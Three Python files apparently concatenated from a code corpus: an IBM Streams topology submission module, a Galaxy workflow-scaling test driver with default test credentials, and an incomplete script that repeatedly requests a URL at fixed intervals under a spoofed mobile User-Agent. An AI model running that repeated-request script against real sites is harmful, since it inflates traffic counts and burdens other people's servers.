import subprocess
import threading
import sys
import codecs
import tempfile
logger = logging.getLogger('streamsx.topology.context')
#
# Submission of a python graph using the Java Application API
# The JAA is reused to have a single set of code that creates
# SPL, the toolkit, the bundle and submits it to the relevant
# environment
#
def submit(ctxtype, graph, config=None, username=None, password=None):
"""
Submits a `Topology` (application) using the specified context type.
Used to submit an application for compilation into a Streams application and
execution within an Streaming Analytics service or IBM Streams instance.
`ctxtype` defines how the application will be submitted, see :py:class:`ContextTypes`.
The parameters `username` and `password` are only required when submitting to an
IBM Streams instance and the code performing the submit needs to access the
Streams REST API. Accessing data from views created by
:py:meth:`~streamsx.topology.topology.Stream.view` requires access to the Streams REST API.
Args:
ctxtype(str): Type of context the application will be submitted to. A value from :py:class:`ContextTypes`.
graph(Topology): The application topology to be submitted.
config(dict): Configuration for the submission.
username(str): Username for the Streams REST api.
password(str): Password for `username`.
Returns:
SubmissionResult: Result of the submission. For details of what is contained see the :py:class:`ContextTypes`
constant passed as `ctxtype`.
"""
graph = graph.graph
if not graph.operators:
raise ValueError("Topology {0} does not contain any streams.".format(graph.topology.name))
context_submitter = _SubmitContextFactory(graph, config, username, password).get_submit_context(ctxtype)
return SubmissionResult(context_submitter.submit())
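# A minimal usage sketch (assumes a Topology named `topo` has already been built; STANDALONE
# is one of the context types defined in ContextTypes below):
#
#     from streamsx.topology import context
#     result = context.submit(context.ContextTypes.STANDALONE, topo)
#     print(result.return_code)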
class _BaseSubmitter(object):
"""
A submitter which handles submit operations common across all submitter types.
"""
def __init__(self, ctxtype, config, graph):
self.ctxtype = ctxtype
self.config = dict()
if config is not None:
# Make copy of config to avoid modifying
# the callers config
self.config.update(config)
self.graph = graph
self.fn = None
self.results_file = None
def _config(self):
"Return the submit configuration"
return self.config
def submit(self):
# Convert the JobConfig into overlays
self._create_job_config_overlays()
# encode the relevant python version information into the config
self._add_python_info()
# Create the json file containing the representation of the application
try:
self._create_json_file(self._create_full_json())
except IOError:
logger.error("Error writing json graph to file.")
raise
tk_root = self._get_toolkit_root()
cp = os.path.join(tk_root, "lib", "com.ibm.streamsx.topology.jar")
streams_install = os.environ.get('STREAMS_INSTALL')
# If there is no streams install, get java from JAVA_HOME and use the remote contexts.
if streams_install is None:
java_home = os.environ.get('JAVA_HOME')
if java_home is None:
raise ValueError("JAVA_HOME not found. Please set the JAVA_HOME system variable")
jvm = os.path.join(java_home, "bin", "java")
submit_class = "com.ibm.streamsx.topology.context.remote.RemoteContextSubmit"
# Otherwise, use the Java version from the streams install
else:
jvm = os.path.join(streams_install, "java", "jre", "bin", "java")
if ConfigParams.FORCE_REMOTE_BUILD in self.config and self.config[ConfigParams.FORCE_REMOTE_BUILD]:
submit_class = "com.ibm.streamsx.topology.context.remote.RemoteContextSubmit"
else:
submit_class = "com.ibm.streamsx.topology.context.local.StreamsContextSubmit"
cp = cp + ':' + os.path.join(streams_install, "lib", "com.ibm.streams.operator.samples.jar")
args = [jvm, '-classpath', cp, submit_class, self.ctxtype, self.fn]
logger.info("Generating SPL and submitting application.")
proc_env = self._get_java_env()
process = subprocess.Popen(args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0, env=proc_env)
stderr_thread = threading.Thread(target=_print_process_stderr, args=([process, self]))
stderr_thread.daemon = True
stderr_thread.start()
stdout_thread = threading.Thread(target=_print_process_stdout, args=([process]))
stdout_thread.daemon = True
stdout_thread.start()
process.wait()
results_json = {}
# Only try to read the results file if the submit was successful.
if process.returncode == 0:
with open(self.results_file) as _file:
try:
results_json = json.loads(_file.read())
except IOError:
logger.error("Could not read file:" + str(_file.name))
raise
except json.JSONDecodeError:
logger.error("Could not parse results file:" + str(_file.name))
raise
except:
logger.error("Unknown error while processing results file.")
raise
_delete_json(self)
results_json['return_code'] = process.returncode
self._augment_submission_result(results_json)
self.submission_results = results_json
return results_json
def _augment_submission_result(self, submission_result):
"""Allow a subclass to augment a submission result"""
pass
def _get_java_env(self):
"Get the environment to be passed to the Java execution"
return dict(os.environ)
def _add_python_info(self):
# Python information added to deployment
pi = {}
pi["prefix"] = sys.exec_prefix
pi["version"] = sys.version
self.config["python"] = pi
def _create_job_config_overlays(self):
if ConfigParams.JOB_CONFIG in self.config:
jco = self.config[ConfigParams.JOB_CONFIG]
del self.config[ConfigParams.JOB_CONFIG]
jco._add_overlays(self.config)
def _create_full_json(self):
fj = dict()
# Removing Streams Connection object because it is not JSON serializable, and not applicable for submission
# Need to re-add it, since the StreamsConnection needs to be returned from the submit.
sc = self.config.pop(ConfigParams.STREAMS_CONNECTION, None)
fj["deploy"] = self.config.copy()
fj["graph"] = self.graph.generateSPLGraph()
_file = tempfile.NamedTemporaryFile(prefix="results", suffix=".json", mode="w+t", delete=False)
_file.close()
fj["submissionResultsFile"] = _file.name
self.results_file = _file.name
logger.debug("Results file created at " + _file.name)
self.config[ConfigParams.STREAMS_CONNECTION] = sc
return fj
def _create_json_file(self, fj):
if sys.hexversion < 0x03000000:
tf = tempfile.NamedTemporaryFile(mode="w+t", suffix=".json", prefix="splpytmp", delete=False)
else:
tf = tempfile.NamedTemporaryFile(mode="w+t", suffix=".json", encoding="UTF-8", prefix="splpytmp",
delete=False)
tf.write(json.dumps(fj, sort_keys=True, indent=2, separators=(',', ': ')))
tf.close()
self.fn = tf.name
def _setup_views(self):
# Link each view back to this context.
if self.graph.get_views():
for view in self.graph.get_views():
view._submit_context = self
def streams_connection(self):
raise NotImplementedError("Views require submission to DISTRIBUTED or ANALYTICS_SERVICE context")
# There are two modes for execution.
#
# Pypi (Python focused)
# Pypi (pip install) package includes the SPL toolkit as
# streamsx/.toolkit/com.ibm.streamsx.topology
# However the streamsx Python packages have been moved out
# of the toolkit's (opt/python/package) compared
# to the original toolkit layout. They are moved to the
# top level of the pypi package.
#
# SPL Toolkit (SPL focused):
# Streamsx Python packages are executed from opt/python/packages
#
# This function determines the root of the SPL toolkit based
# upon the existence of the '.toolkit' directory.
#
@staticmethod
def _get_toolkit_root():
# Directory of this file (streamsx/topology)
dir = os.path.dirname(os.path.abspath(__file__))
# This is streamsx
dir = os.path.dirname(dir)
# See if .toolkit exists, if so executing from
# a pip install
tk_root = os.path.join(dir, '.toolkit', 'com.ibm.streamsx.topology')
if os.path.isdir(tk_root):
return tk_root
# Else dir is tk/opt/python/packages/streamsx
dir = os.path.dirname(dir)
dir = os.path.dirname(dir)
dir = os.path.dirname(dir)
tk_root = os.path.dirname(dir)
return tk_root
class _StreamingAnalyticsSubmitter(_BaseSubmitter):
"""
A submitter which supports the ANALYTICS_SERVICE (Streaming Analytics service) context.
"""
def __init__(self, ctxtype, config, graph):
super(_StreamingAnalyticsSubmitter, self).__init__(ctxtype, config, graph)
self._streams_connection = self._config().get(ConfigParams.STREAMS_CONNECTION)
self._vcap_services = self._config().get(ConfigParams.VCAP_SERVICES)
self._service_name = self._config().get(ConfigParams.SERVICE_NAME)
if self._streams_connection is not None:
if not isinstance(self._streams_connection, rest.StreamingAnalyticsConnection):
raise ValueError("config must contain a StreamingAnalyticsConnection object when submitting to "
"{} context".format(ctxtype))
# Use credentials stored within StreamingAnalyticsConnection
self._service_name = self._streams_connection.service_name
self._vcap_services = {'streaming-analytics': [
{'name': self._service_name, 'credentials': self._streams_connection.credentials}
]}
self._config()[ConfigParams.SERVICE_NAME] = self._service_name
# TODO: Compare credentials between the config and StreamsConnection, verify they are the same
# Clear the VCAP_SERVICES key in config, since env var will contain the content
self._config().pop(ConfigParams.VCAP_SERVICES, None)
self._setup_views()
def streams_connection(self):
if self._streams_connection is None:
self._streams_connection = rest.StreamingAnalyticsConnection(self._vcap_services, self._service_name)
return self._streams_connection
def _augment_submission_result(self, submission_result):
vcap = rest._get_vcap_services(self._vcap_services)
credentials = rest._get_credentials(vcap, self._service_name)
instance_id = credentials['jobs_path'].split('/service_instances/', 1)[1].split('/', 1)[0]
submission_result['instanceId'] = instance_id
submission_result['streamsConnection'] = self.streams_connection()
def _get_java_env(self):
"Pass the VCAP through the environment to the java submission"
env = super(_StreamingAnalyticsSubmitter, self)._get_java_env()
vcap = rest._get_vcap_services(self._vcap_services)
env['VCAP_SERVICES'] = json.dumps(vcap)
return env
class _DistributedSubmitter(_BaseSubmitter):
"""
A submitter which supports the DISTRIBUTED (on-prem cluster) context.
"""
def __init__(self, ctxtype, config, graph, username, password):
_BaseSubmitter.__init__(self, ctxtype, config, graph)
self._streams_connection = config.get(ConfigParams.STREAMS_CONNECTION)
self.username = username
self.password = password
# Verify if credential (if supplied) is consistent with those in StreamsConnection
if self._streams_connection is not None:
self.username = self._streams_connection.rest_client._username
self.password = self._streams_connection.rest_client._password
if ((username is not None and username != self.username or
password is not None and password != self.password)):
raise RuntimeError('Credentials supplied in the arguments differ than '
'those specified in the StreamsConnection object')
# Give each view in the app the necessary information to connect to SWS.
self._setup_views()
def streams_connection(self):
if self._streams_connection is None:
self._streams_connection = rest.StreamsConnection(self.username, self.password)
return self._streams_connection
def _augment_submission_result(self, submission_result):
submission_result['instanceId'] = os.environ.get('STREAMS_INSTANCE_ID', 'StreamsInstance')
# If we have the information to create a StreamsConnection, do it
if not ((self.username is None or self.password is None) and
self.config.get(ConfigParams.STREAMS_CONNECTION) is None):
submission_result['streamsConnection'] = self.streams_connection()
class _SubmitContextFactory(object):
"""
ContextSubmitter:
Responsible for performing the correct submission depending on a number of factors, including: the
presence/absence of a Streams install, the type of context, and whether the user seeks to retrieve data via REST.
"""
def __init__(self, graph, config=None, username=None, password=None):
self.graph = graph
self.config = config
self.username = username
self.password = password
if self.config is None:
self.config = {}
def get_submit_context(self, ctxtype):
# If there is no streams install present, currently only ANALYTICS_SERVICE, TOOLKIT, and BUILD_ARCHIVE
# are supported.
streams_install = os.environ.get('STREAMS_INSTALL')
if streams_install is None:
if not (ctxtype == ContextTypes.TOOLKIT or ctxtype == ContextTypes.BUILD_ARCHIVE
or ctxtype == ContextTypes.ANALYTICS_SERVICE or ctxtype == ContextTypes.STREAMING_ANALYTICS_SERVICE):
raise ValueError(ctxtype + " can only be submitted when an IBM Streams install is present.")
if ctxtype == ContextTypes.DISTRIBUTED:
logger.debug("Selecting the DISTRIBUTED context for submission")
return _DistributedSubmitter(ctxtype, self.config, self.graph, self.username, self.password)
elif ctxtype == ContextTypes.ANALYTICS_SERVICE or ctxtype == ContextTypes.STREAMING_ANALYTICS_SERVICE:
logger.debug("Selecting the STREAMING_ANALYTICS_SERVICE context for submission")
if not (sys.version_info.major == 3 and sys.version_info.minor == 5):
raise RuntimeError("The ANALYTICS_SERVICE context only supports Python version 3.5")
ctxtype = ContextTypes.STREAMING_ANALYTICS_SERVICE
return _StreamingAnalyticsSubmitter(ctxtype, self.config, self.graph)
else:
logger.debug("Using the BaseSubmitter, and passing the context type through to java.")
return _BaseSubmitter(ctxtype, self.config, self.graph)
# Used to delete the JSON file after it is no longer needed.
def _delete_json(submitter):
for fn in [submitter.fn, submitter.results_file]:
if os.path.isfile(fn):
os.remove(fn)
# Used by a thread which polls a subprocess's stdout and writes it to stdout
def _print_process_stdout(process):
try:
while True:
if sys.version_info.major == 2:
sout = codecs.getwriter('utf8')(sys.stdout)
line = process.stdout.readline()
if len(line) == 0:
process.stdout.close()
break
line = line.decode("utf-8").strip()
if sys.version_info.major == 2:
sout.write(line)
sout.write("\n")
else:
print(line)
except:
logger.error("Error reading from Java subprocess stdout stream.")
raise
finally:
process.stdout.close()
# Used by a thread which polls a subprocess's stderr and writes it to stderr, until the sc compilation
# has begun.
def _print_process_stderr(process, submitter):
try:
if sys.version_info.major == 2:
serr = codecs.getwriter('utf8')(sys.stderr)
while True:
line = process.stderr.readline()
if len(line) == 0:
process.stderr.close()
break
line = line.decode("utf-8").strip()
if sys.version_info.major == 2:
serr.write(line)
serr.write("\n")
else:
print(line)
except:
logger.error("Error reading from Java subprocess stderr stream.")
raise
finally:
process.stderr.close()
class ContextTypes(object):
"""
Submission context types.
A :py:class:`~streamsx.topology.topology.Topology` is submitted using :py:func:`submit` and a context type.
Submission of a `Topology` generally builds the application into a Streams application
bundle (sab) file and then submits it for execution in the required context.
The Streams application bundle contains all the artifacts required by an application such
that it can be executed remotely (e.g. on a Streaming Analytics service), including
distributing the execution of the application across multiple resources (hosts).
The context type defines which context is used for submission.
The main context types result in a running application and are:
* :py:const:`STREAMING_ANALYTICS_SERVICE` - Application is submitted to a Streaming Analytics service running on IBM Bluemix cloud platform.
* :py:const:`DISTRIBUTED` - Application is submitted to an IBM Streams instance.
* :py:const:`STANDALONE` - Application is executed as a local process, IBM Streams `standalone` application. Typically this is used during development or testing.
The :py:const:`BUNDLE` context type compiles the application (`Topology`) to produce a
Streams application bundle (sab file). The bundle is not executed but may subsequently be submitted
to a Streaming Analytics service or an IBM Streams instance. A bundle may be submitted multiple
times to services or instances, each resulting in a unique job (running application).
"""
STREAMING_ANALYTICS_SERVICE = 'STREAMING_ANALYTICS_SERVICE'
"""Submission to Streaming Analytics service running on IBM Bluemix cloud platform.
The `Topology` is compiled and the resultant Streams application bundle
(sab file) is submitted for execution on the Streaming Analytics service.
When **STREAMS_INSTALL** is not set or the :py:func:`submit` `config` parameter has
:py:const:`~ConfigParams.FORCE_REMOTE_BUILD` set to `True` the compilation of the application
occurs remotely by the service. This allows creation and submission of Streams applications
without a local install of IBM Streams.
When **STREAMS_INSTALL** is set and the :py:func:`submit` `config` parameter has
:py:const:`~ConfigParams.FORCE_REMOTE_BUILD` set to `False` or not set then the creation of the
Streams application bundle occurs locally and the bundle is submitted for execution on the service.
Environment variables:
These environment variables define how the application is built and submitted.
* **STREAMS_INSTALL** - (optional) Location of an IBM Streams installation (4.0.1 or later). The install must be running on RedHat/CentOS 6 and `x86_64` architecture.
"""
ANALYTICS_SERVICE = 'ANALYTICS_SERVICE'
"""Synonym for :py:const:`STREAMING_ANALYTICS_SERVICE`.
"""
DISTRIBUTED = 'DISTRIBUTED'
"""Submission to an IBM Streams instance.
The `Topology` is compiled locally and the resultant Streams application bundle
(sab file) is submitted to an IBM Streams instance.
Environment variables:
These environment variables define how the application is built and submitted.
* **STREAMS_INSTALL** - Location of an IBM Streams installation (4.0.1 or later).
* **STREAMS_DOMAIN_ID** - Domain identifier for the Streams instance.
* **STREAMS_INSTANCE_ID** - Instance identifier.
* **STREAMS_ZKCONNECT** - (optional) ZooKeeper connection string for domain (when not using an embedded ZooKeeper)
"""
STANDALONE = 'STANDALONE'
"""Build and execute locally.
Compiles and executes the `Topology` locally in IBM Streams standalone mode as a separate sub-process.
Typically used for development and testing.
The call to :py:func:`submit` returns when (if) the application completes. An application
completes when it has finite source streams and all tuples from those streams have been
processed by the complete topology. If the source streams are infinite (e.g. reading tweets)
then the standalone application will not complete.
Environment variables:
These environment variables define how the application is built.
* **STREAMS_INSTALL** - Location of an IBM Streams installation (4.0.1 or later).
"""
BUNDLE = 'BUNDLE'
"""Create a Streams application bundle.
The `Topology` is compiled locally to produce Streams application bundle (sab file).
The resultant application can be submitted to:
* Streaming Analytics service using the Streams console or the Streaming Analytics REST api.
* IBM Streams instance using the Streams console, JMX api or command line ``streamtool submitjob``.
* Executed standalone for development or testing (when built with IBM Streams 4.2 or later).
The bundle must be built on the same operating system version and architecture as the intended running
environment. For Streaming Analytics service this is currently RedHat/CentOS 6 and `x86_64` architecture.
Environment variables:
These environment variables define how the application is built.
* **STREAMS_INSTALL** - Location of an IBM Streams installation (4.0.1 or later).
"""
TOOLKIT = 'TOOLKIT'
"""Creates an SPL toolkit.
`Topology` applications are translated to SPL applications before compilation into an Streams application
bundle. This context type produces the intermediate SPL toolkit that is input to the SPL compiler for
bundle creation.
.. note::
`TOOLKIT` is typically only used when diagnosing issues with bundle generation.
"""
BUILD_ARCHIVE = 'BUILD_ARCHIVE'
"""Creates a build archive.
This context type produces the intermediate code archive used for bundle creation.
.. note::
`BUILD_ARCHIVE` is typically only used when diagnosing issues with bundle generation.
"""
STANDALONE_BUNDLE = 'STANDALONE_BUNDLE'
"""Create a Streams application bundle for standalone execution.
The `Topology` is compiled locally to produce Streams standalone application bundle (sab file).
The resultant application can be submitted to:
* Executed standalone for development or testing.
The bundle must be built on the same operating system version and architecture as the intended running
environment. For Streaming Analytics service this is currently RedHat/CentOS 6 and `x86_64` architecture.
Environment variables:
These environment variables define how the application is built.
* **STREAMS_INSTALL** - Location of an IBM Streams installation (4.0.1 or 4.1.x).
.. deprecated:: IBM Streams 4.2
Use :py:const:`BUNDLE` when compiling with IBM Streams 4.2 or later.
"""
class ConfigParams(object):
"""
Configuration options which may be used as keys in :py:func:`submit` `config` parameter.
"""
VCAP_SERVICES = 'topology.service.vcap'
"""Streaming Analytics service credentials in **VCAP_SERVICES** format.
Provides the connection credentials when connecting to a Streaming Analytics service
using context type :py:const:`~ContextTypes.STREAMING_ANALYTICS_SERVICE`.
The key overrides the environment variable **VCAP_SERVICES**.
The value can be:
* Path to a local file containing a JSON representation of the VCAP services information.
* Dictionary containing the VCAP services information.
"""
SERVICE_NAME = 'topology.service.name'
"""Streaming Analytics service name.
Selects the specific Streaming Analytics service from VCAP services information
defined by the environment variable **VCAP_SERVICES** or the key :py:const:`VCAP_SERVICES` in the `submit` config.
"""
FORCE_REMOTE_BUILD = 'topology.forceRemoteBuild'
"""Force a remote build of the application.
When submitting to :py:const:`STREAMING_ANALYTICS_SERVICE` a local build of the Streams application bundle
will occur if the environment variable **STREAMS_INSTALL** is set. Setting this flag to `True` ignores the
local Streams install and forces the build to occur remotely using the service.
"""
JOB_CONFIG = 'topology.jobConfigOverlays'
"""
Key for a :py:class:`JobConfig` object representing a job configuration for a submission.
"""
STREAMS_CONNECTION = 'topology.streamsConnection'
"""
Key for a :py:class:`StreamsConnection` object for connecting to a running IBM Streams instance.
"""
class JobConfig(object):
"""
Job configuration.
`JobConfig` allows configuration of the job that will result from
submission of a :py:class:`Topology` (application).
A `JobConfig` is set in the `config` dictionary passed to :py:func:`~streamsx.topology.context.submit`
using the key :py:const:`~ConfigParams.JOB_CONFIG`. :py:meth:`~JobConfig.add` exists as a convenience
method to add it to a submission configuration.
Args:
job_name(str): The name that is assigned to the job. A job name must be unique within a Streams instance.
When set to `None` a system generated name is used.
job_group(str): The job group to use to control permissions for the submitted job.
preload(bool): Specifies whether to preload the job onto all resources in the instance, even if the job is
not currently needed on each. Preloading the job can improve PE restart performance if the PEs are
relocated to a new resource.
data_directory(str): Specifies the location of the optional data directory. The data directory is a path
within the cluster that is running the Streams instance.
tracing: Specify the application trace level. See :py:attr:`tracing`
Example::
# Submit a job with the name NewsIngester
cfg = {}
job_config = JobConfig(job_name='NewsIngester')
job_config.add(cfg)
context.submit('ANALYTICS_SERVICE', topo, cfg)
"""
def __init__(self, job_name=None, job_group=None, preload=False, data_directory=None, tracing=None):
self.job_name = job_name
self.job_group = job_group
self.preload = preload
self.data_directory = data_directory
self.tracing = tracing
self._pe_count = None
@property
def tracing(self):
"""
Runtime application trace level.
The runtime application trace level can be a string with value ``error``, ``warn``, ``info``,
``debug`` or ``trace``.
In addition, a level from the Python ``logging`` module can be used, with ``CRITICAL`` and ``ERROR`` mapping
to ``error``, ``WARNING`` to ``warn``, ``INFO`` to ``info`` and ``DEBUG`` to ``debug``.
Setting tracing to `None` or ``logging.NOTSET`` will result in the job submission using the Streams instance
application trace level.
The value of ``tracing`` is the level as a string (``error``, ``warn``, ``info``, ``debug`` or ``trace``)
or None.
"""
return self._tracing
@tracing.setter
def tracing(self, level):
if level is None:
pass
elif level in {'error', 'warn', 'info', 'debug', 'trace'}:
pass
elif level == logging.CRITICAL or level == logging.ERROR:
level = 'error'
elif level == logging.WARNING:
level = 'warn'
elif level == logging.INFO:
level = 'info'
elif level == logging.DEBUG:
level = 'debug'
elif level == logging.NOTSET:
level = None
else:
raise ValueError("Tracing value {0} not supported.".format(level))
self._tracing = level
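# For example: job_config.tracing = logging.DEBUG is stored as 'debug', while
# job_config.tracing = 'trace' is stored unchanged.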
@property
def target_pe_count(self):
"""Target processing element count.
When submitted against a Streams instance `target_pe_count` provides
a hint to the scheduler as to how to partition the topology
across processing elements (processes) for the job execution. When a job
contains multiple processing elements (PEs) then the Streams scheduler can
distribute the PEs across the resources (hosts) running in the instance.
When set to ``None`` (the default) no hint is supplied to the scheduler.
The number of PEs in the submitted job will be determined by the scheduler.
The value is only a target and may be ignored when the topology contains
:py:meth:`~Stream.isolate` calls.
.. note::
Only supported in Streaming Analytics service and IBM Streams 4.2 or later.
"""
if self._pe_count is None:
return None
return int(self._pe_count)
@target_pe_count.setter
def target_pe_count(self, count):
if count is not None:
count = int(count)
if count < 1:
raise ValueError("target_pe_count must be greater than 0.")
self._pe_count = count
def add(self, config):
"""
Add this `JobConfig` into a submission configuration object.
Args:
config(dict): Submission configuration.
Returns:
dict: config.
"""
config[ConfigParams.JOB_CONFIG] = self
return config
def _add_overlays(self, config):
"""
Add this as a jobConfigOverlays JSON to config.
"""
jco = {}
config["jobConfigOverlays"] = [jco]
jc = {}
if self.job_name is not None:
jc["jobName"] = self.job_name
if self.job_group is not None:
jc["jobGroup"] = self.job_group
if self.data_directory is not None:
jc["dataDirectory"] = self.data_directory
if self.preload:
jc['preloadApplicationBundles'] = True
if self.tracing is not None:
jc['tracing'] = self.tracing
if jc:
jco["jobConfig"] = jc
if self.target_pe_count is not None and self.target_pe_count >= 1:
deployment = {'fusionScheme' : 'manual', 'fusionTargetPeCount' : self.target_pe_count}
jco["deploymentConfig"] = deployment
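# Illustrative shape of the overlay built by JobConfig._add_overlays above (values are
# hypothetical): with job_name='NewsIngester' and target_pe_count=2 the submission config gains
#   {"jobConfigOverlays": [{"jobConfig": {"jobName": "NewsIngester"},
#                           "deploymentConfig": {"fusionScheme": "manual",
#                                                "fusionTargetPeCount": 2}}]}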
class SubmissionResult(object):
"""Passed back to the user after a call to submit.
Allows the user to use dot notation to access dictionary elements."""
def __init__(self, results):
self.results = results
@property
def job(self):
"""If able, returns the job associated with the submitted build.
If a username/password, StreamsConnection, or vcap file was not supplied,
returns None.
*NOTE*: The @property tag supersedes __getattr__. In other words, this job method is
called before __getattr__(self, 'job') is called.
"""
if 'streamsConnection' in self.results:
sc = self.streamsConnection
inst = sc.get_instance(self.instanceId)
return inst.get_job(self.jobId)
return None
def __getattr__(self, key):
if key in self.__getattribute__("results"):
return self.results[key]
return self.__getattribute__(key)
def __setattr__(self, key, value):
if "results" in self.__dict__:
results = self.results
results[key] = value
else:
super(SubmissionResult, self).__setattr__(key, value)
def __getitem__(self, item):
return self.__getattr__(item)
def __setitem__(self, key, value):
return self.__setattr__(key, value)
def __delitem__(self, key):
if key in self.__getattribute__("results"):
del self.results[key]
return
self.__delattr__(key)
def __contains__(self, item):
return item in self.results
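# Minimal illustrative sketch of SubmissionResult's dict/attribute duality (values are hypothetical):
#   result = SubmissionResult({'jobId': '7', 'instanceId': 'i1'})
#   result.jobId == result['jobId'] == '7'    # attribute access falls back to the results dict
#   'instanceId' in result                    # True, via __contains__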
|
workflows_scaling.py
|
#!/usr/bin/env python
"""A small script to drive workflow performance testing.
% ./test/manual/launch_and_run.sh workflows_scaling --collection_size 500 --workflow_depth 4
$ .venv/bin/python scripts/summarize_timings.py --file /tmp/<work_dir>/handler1.log --pattern 'Workflow step'
$ .venv/bin/python scripts/summarize_timings.py --file /tmp/<work_dir>/handler1.log --pattern 'Created step'
"""
import functools
import json
import os
import random
import sys
from argparse import ArgumentParser
from threading import Thread
from uuid import uuid4
from bioblend import galaxy
from gxformat2 import python_to_workflow
galaxy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir))
sys.path[1:1] = [os.path.join(galaxy_root, "lib"), os.path.join(galaxy_root, "test")]
from galaxy_test.base.populators import (
GiDatasetCollectionPopulator,
GiDatasetPopulator,
GiWorkflowPopulator,
)
LONG_TIMEOUT = 1000000000
DESCRIPTION = "Script to exercise the workflow engine."
def main(argv=None):
"""Entry point for workflow driving."""
arg_parser = ArgumentParser(description=DESCRIPTION)
arg_parser.add_argument("--api_key", default="testmasterapikey")
arg_parser.add_argument("--host", default="http://localhost:8080/")
arg_parser.add_argument("--collection_size", type=int, default=20)
arg_parser.add_argument("--schedule_only_test", default=False, action="store_true")
arg_parser.add_argument("--workflow_depth", type=int, default=10)
arg_parser.add_argument("--workflow_count", type=int, default=1)
group = arg_parser.add_mutually_exclusive_group()
group.add_argument("--two_outputs", default=False, action="store_true")
group.add_argument("--wave_simple", default=False, action="store_true")
args = arg_parser.parse_args(argv)
uuid = str(uuid4())
workflow_struct = _workflow_struct(args, uuid)
has_input = any([s.get("type", "tool") == "input_collection" for s in workflow_struct])
if not has_input:
uuid = None
gi = _gi(args)
workflow = python_to_workflow(workflow_struct)
workflow_info = gi.workflows.import_workflow_json(workflow)
workflow_id = workflow_info["id"]
target = functools.partial(_run, args, gi, workflow_id, uuid)
threads = []
for _ in range(args.workflow_count):
t = Thread(target=target)
t.daemon = True
t.start()
threads.append(t)
for t in threads:
t.join()
def _run(args, gi, workflow_id, uuid):
dataset_populator = GiDatasetPopulator(gi)
dataset_collection_populator = GiDatasetCollectionPopulator(gi)
history_id = dataset_populator.new_history()
if uuid is not None:
contents = []
for i in range(args.collection_size):
contents.append("random dataset number #%d" % i)
hdca = dataset_collection_populator.create_list_in_history(history_id, contents=contents).json()
label_map = {
uuid: {"src": "hdca", "id": hdca["id"]},
}
else:
label_map = {}
workflow_request = dict(
history="hist_id=%s" % history_id,
)
workflow_request["inputs"] = json.dumps(label_map)
url = "workflows/%s/usage" % (workflow_id)
invoke_response = dataset_populator._post(url, data=workflow_request).json()
invocation_id = invoke_response["id"]
workflow_populator = GiWorkflowPopulator(gi)
if args.schedule_only_test:
workflow_populator.wait_for_invocation(
workflow_id,
invocation_id,
timeout=LONG_TIMEOUT,
)
else:
workflow_populator.wait_for_workflow(
workflow_id,
invocation_id,
history_id,
timeout=LONG_TIMEOUT,
)
def _workflow_struct(args, input_uuid):
if args.two_outputs:
return _workflow_struct_two_outputs(args, input_uuid)
elif args.wave_simple:
return _workflow_struct_wave(args, input_uuid)
else:
return _workflow_struct_simple(args, input_uuid)
def _workflow_struct_simple(args, input_uuid):
workflow_struct = [
{"tool_id": "create_input_collection", "state": {"collection_size": args.collection_size}},
{"tool_id": "cat", "state": {"input1": _link(0, "output")}}
]
workflow_depth = args.workflow_depth
for i in range(workflow_depth):
link = str(i + 1) + "#out_file1"
workflow_struct.append(
{"tool_id": "cat", "state": {"input1": _link(link)}}
)
return workflow_struct
def _workflow_struct_two_outputs(args, input_uuid):
workflow_struct = [
{"type": "input_collection", "uuid": input_uuid},
{"tool_id": "cat", "state": {"input1": _link(0), "input2": _link(0)}}
]
workflow_depth = args.workflow_depth
for i in range(workflow_depth):
link1 = str(i + 1) + "#out_file1"
link2 = str(i + 1) + "#out_file2"
workflow_struct.append(
{"tool_id": "cat", "state": {"input1": _link(link1), "input2": _link(link2)}}
)
return workflow_struct
def _workflow_struct_wave(args, input_uuid):
workflow_struct = [
{"tool_id": "create_input_collection", "state": {"collection_size": args.collection_size}},
{"tool_id": "cat_list", "state": {"input1": _link(0, "output")}}
]
workflow_depth = args.workflow_depth
for i in range(workflow_depth):
step = i + 2
if step % 2 == 1:
workflow_struct += [{"tool_id": "cat_list", "state": {"input1": _link(step - 1, "output")}}]
else:
workflow_struct += [{"tool_id": "split", "state": {"input1": _link(step - 1, "out_file1")}}]
return workflow_struct
def _link(link, output_name=None):
if output_name is not None:
link = str(link) + "#" + output_name
return {"$link": link}
def _gi(args):
gi = galaxy.GalaxyInstance(args.host, key=args.api_key)
name = "wftest-user-%d" % random.randint(0, 1000000)
user = gi.users.create_local_user(name, "%s@galaxytesting.dev" % name, "pass123")
user_id = user["id"]
api_key = gi.users.create_user_apikey(user_id)
user_gi = galaxy.GalaxyInstance(args.host, api_key)
return user_gi
if __name__ == "__main__":
main()
|
duang.py
|
# -*- coding: utf-8 -*-
# Repeatedly ("duang duang") hit a given URL at a fixed interval
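# CLI usage (illustrative, matching the options parsed below):
#   python duang.py --url=http://example.com --count=100 --sleep=2
# Run it without arguments to get the Tk GUI instead.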
import getopt
import re
import sys
import threading
import time
import tkinter.messagebox as messagebox
import urllib
import logging
from tkinter import *
from urllib import request
from urllib.request import HTTPRedirectHandler
class OpenerHTTPRedirectHandler(HTTPRedirectHandler):
def http_error_301(self, req, fp, code, msg, headers):
print(headers.headers)
return HTTPRedirectHandler.http_error_301(self, req, fp, code, msg, headers)
def http_error_302(self, req, fp, code, msg, headers):
print(headers.headers)
return HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
def refresh(options):
req = request.Request(options.url)
    # install the opener so the redirect handlers defined above are actually used
    request.install_opener(request.build_opener(OpenerHTTPRedirectHandler))
req.add_header("User-Agent", "Mozilla/5.0 (Linux; Android 5.1.1; Nexus 6 Build/LYZ28E) AppleWebKit/537.36 (KHTML, "
"like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36")
with request.urlopen(req) as f:
status = f.status
if options.sleep:
time.sleep(options.sleep)
return status
class Options(object):
url = None
count = None
sleep = None
def __str__(self):
return "<%s url=%s, count=%s, sleep=%s>" % \
(self.__class__.__name__, self.url, self.count, self.sleep)
def parse_options(argv):
print(argv)
opts, args = getopt.getopt(argv, "u:c:s:", ["url=", "count=", "sleep="])
if len(opts) == 0:
        print("Missing arguments, e.g. --url=google.com --count=100 --sleep=2")
raise AttributeError()
options = Options()
for k, v in opts:
if k == "--url":
options.url = v
elif k == "--count":
            options.count = int(v)  # keep numeric so main() can loop on it
elif k == "--sleep":
            options.sleep = int(v)  # numeric seconds for time.sleep()
print(options.__str__())
if not options.url:
        print("Please provide a URL, e.g.: --url=www.google.com")
raise AttributeError()
return options
class Application(Frame):
def __init__(self, master=None):
